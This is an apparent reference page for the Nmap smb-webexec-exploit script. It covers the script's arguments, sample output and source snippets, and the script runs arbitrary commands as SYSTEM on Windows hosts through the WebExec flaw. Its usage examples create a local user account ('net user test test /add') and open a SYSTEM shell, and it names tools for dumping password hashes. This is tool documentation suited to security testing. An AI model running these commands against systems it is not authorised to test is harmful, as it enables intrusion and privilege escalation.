Nmap smb-webexec-exploit NSE Script


This page contains detailed information about how to use the smb-webexec-exploit NSE script. For list of all NSE scripts, visit the Nmap NSE Library.

Select:
Overview
Error Messages

Script Overview


Script source code: https://github.com/nmap/nmap/tree/master/scripts/smb-webexec-exploit.nse
Script categories: intrusive, exploit
Target service / protocol: smb, netbios, tcp
Target network port(s): 445, 139
List of CVEs: -

Script Description


The smb-webexec-exploit.nse script attempts to run a command via WebExService, using the WebExec vulnerability. Given a Windows account (local or domain), this will start an arbitrary executable with SYSTEM privileges over the SMB protocol.

The argument webexec_command will run the command directly. It may or may not start with a GUI. webexec_gui_command will always start with a GUI, and is useful for running commands such as "cmd.exe" as SYSTEM if you have access.

References:

Smb-webexec-exploit NSE Script Arguments


This is a full list of arguments supported by the smb-webexec-exploit.nse script:

webexec_command

The command to run on the target

webexec_gui_command

The command to run on the target with a GUI

smbdomain

The domain to log in with. If you aren't in a domain environment, then anything will (should?) be accepted by the server.

smbhash

A password hash to use when logging in. This is given as a single hex string (32 characters) or a pair of hex strings (both 32 characters, optionally separated by a single character). These hashes are the LanMan or NTLM hash of the user's password, and are stored on disk or in memory. They can be retrieved from memory using the fgdump or pwdump tools.

smbnoguest

Use to disable usage of the 'guest' account.

smbpassword

The password to connect with. Be cautious with this, since some servers will lock accounts if the incorrect password is given. Although it's rare that the Administrator account can be locked out, in the off chance that it can, you could get yourself in trouble. To use a blank password, leave this parameter off altogether.

smbtype

The type of SMB authentication to use. These are the possible options:

  • v1: Sends LMv1 and NTLMv1.
  • LMv1: Sends LMv1 only.
  • NTLMv1: Sends NTLMv1 only (default).
  • v2: Sends LMv2 and NTLMv2.
  • LMv2: Sends LMv2 only.
  • NTLMv2: Doesn't exist; the protocol doesn't support NTLMv2 alone. The default, NTLMv1, is a pretty decent compromise between security and compatibility. If you are paranoid, you might want to use v2 or lmv2 for this. (Actually, if you're paranoid, you should be avoiding this protocol altogether!). If you're using an extremely old system, you might need to set this to v1 or lm, which are less secure but more compatible. For information, see smbauth.lua.

smbusername

The SMB username to log in with. The forms "DOMAIN\username" and "username@DOMAIN" are not understood. To set a domain, use the smbdomain argument.

randomseed

Set to a value to change the filenames/service names that are randomly generated.

smbbasic

Forces the authentication to use basic security, as opposed to "extended security". Against most modern systems, extended security should work, but there may be cases where you want to force basic. There's a chance that you'll get better results for enumerating users if you turn on basic authentication.

smbport

Override the default port choice. If smbport is open, it's used. It's assumed to be the same protocol as port 445, not port 139. Since it probably isn't possible to change Windows' ports normally, this is mostly useful if you're bouncing through a relay or something.

smbsign

Controls whether or not server signatures are checked in SMB packets. By default, on Windows, server signatures aren't enabled or required. By default, this library will always sign packets if it knows how, and will check signatures if the server says to. Possible values are:

  • force: Always check server signatures, even if server says it doesn't support them (will Probably fail, but is technically more secure).
  • negotiate: [default] Use signatures if server supports them.
  • ignore: Never check server signatures. Not recommended.
  • disable: Don't send signatures, at all, and don't check the server's. not recommended. More information on signatures can be found in smbauth.lua.

- - -
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:

nmap --script=smb-webexec-exploit --script-args webexec_command=value,webexec_gui_command=value <target>

Smb-webexec-exploit NSE Script Example Usage


Here's an example of how to use the smb-webexec-exploit.nse script:

nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_command=net user test test /add' -p139,445 <host>

nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_gui_command=cmd' -p139,445 <host>

Smb-webexec-exploit NSE Script Example Output


Here's a sample output from the smb-webexec-exploit.nse script:

| smb-vuln-webexec:
|_  Vulnerable: WebExService could be accessed remotely as the given user!

| smb-vuln-webexec:
|   Vulnerable: WebExService could be accessed remotely as the given user!
|_  ...and successfully started console command: net user test test /add

Smb-webexec-exploit NSE Script Example XML Output


There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce a XML output and save it in the file.xml file.

Author


  • Ron Bowes

References


See Also


Related NSE scripts to the smb-webexec-exploit.nse script:

Visit Nmap NSE Library for more scripts.

The smb-webexec-exploit.nse script may fail with the following error messages. Check for the possible causes by using the code snippets highlighted below found in the script source code. This can often times help in identifying the root cause of the problem.

script-args webexec_command or webexec_gui_command is required to run this script


Here is a relevant code snippet related to the "script-args webexec_command or webexec_gui_command is required to run this script" error message:

55:	
56:	  local webexec_command = stdnse.get_script_args("webexec_command")
57:	  local webexec_gui_command = stdnse.get_script_args("webexec_gui_command")
58:	
59:	  if not webexec_command and not webexec_gui_command then
60:	    return stdnse.format_output(false, "script-args webexec_command or webexec_gui_command is required to run this script")
61:	  end
62:	
63:	  local open_result
64:	  local close_result
65:	  local bind_result

WebExService is not installed


Here is a relevant code snippet related to the "WebExService is not installed" error message:

98:	
99:	  if open_status == false then
100:	    status, close_result = msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])
101:	    smb.stop(smbstate)
102:	    if string.match(open_service_result, 'NT_STATUS_SERVICE_DOES_NOT_EXIST') then
103:	      return stdnse.format_output(false, "WebExService is not installed")
104:	    elseif string.match(open_service_result, 'NT_STATUS_WERR_ACCESS_DENIED') then
105:	      return stdnse.format_output(false, "WebExService could not be accessed by " .. username)
106:	    end
107:	    return stdnse.format_output(false, "WebExService failed to open with an unknown status: " .. open_service_result)
108:	  end

WebExService could not be accessed by


Here is a relevant code snippet related to the "WebExService could not be accessed by " error message:

100:	    status, close_result = msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])
101:	    smb.stop(smbstate)
102:	    if string.match(open_service_result, 'NT_STATUS_SERVICE_DOES_NOT_EXIST') then
103:	      return stdnse.format_output(false, "WebExService is not installed")
104:	    elseif string.match(open_service_result, 'NT_STATUS_WERR_ACCESS_DENIED') then
105:	      return stdnse.format_output(false, "WebExService could not be accessed by " .. username)
106:	    end
107:	    return stdnse.format_output(false, "WebExService failed to open with an unknown status: " .. open_service_result)
108:	  end
109:	
110:	

WebExService failed to open with an unknown status:


Here is a relevant code snippet related to the "WebExService failed to open with an unknown status: " error message:

102:	    if string.match(open_service_result, 'NT_STATUS_SERVICE_DOES_NOT_EXIST') then
103:	      return stdnse.format_output(false, "WebExService is not installed")
104:	    elseif string.match(open_service_result, 'NT_STATUS_WERR_ACCESS_DENIED') then
105:	      return stdnse.format_output(false, "WebExService could not be accessed by " .. username)
106:	    end
107:	    return stdnse.format_output(false, "WebExService failed to open with an unknown status: " .. open_service_result)
108:	  end
109:	
110:	
111:	  stdnse.debug1("Successfully opened a handle to WebExService")
112:	

Failed to start the service:


Here is a relevant code snippet related to the "Failed to start the service: " error message:

112:	
113:	  local output = nil
114:	  if webexec_command then
115:	    status, result = run_command(smbstate, open_service_result['handle'], 'cmd /c ' .. webexec_command)
116:	    if not status then
117:	      output = "Failed to start the service: " .. result
118:	    else
119:	      output = "Asked WebExService to run " .. webexec_command
120:	    end
121:	  end
122:	

Failed to start the service:


Here is a relevant code snippet related to the "Failed to start the service: " error message:

126:	      stdnse.sleep(1)
127:	    end
128:	
129:	    status, result = run_command(smbstate, open_service_result['handle'], 'wmic process call create ' .. webexec_gui_command)
130:	    if not status then
131:	      output = "Failed to start the service: " .. result
132:	    else
133:	      output = "Asked WebExService to run " .. webexec_gui_command .. " (with a GUI)"
134:	    end
135:	  end
136:	

Version


This page has been created based on Nmap version 7.92.

Go back to menu.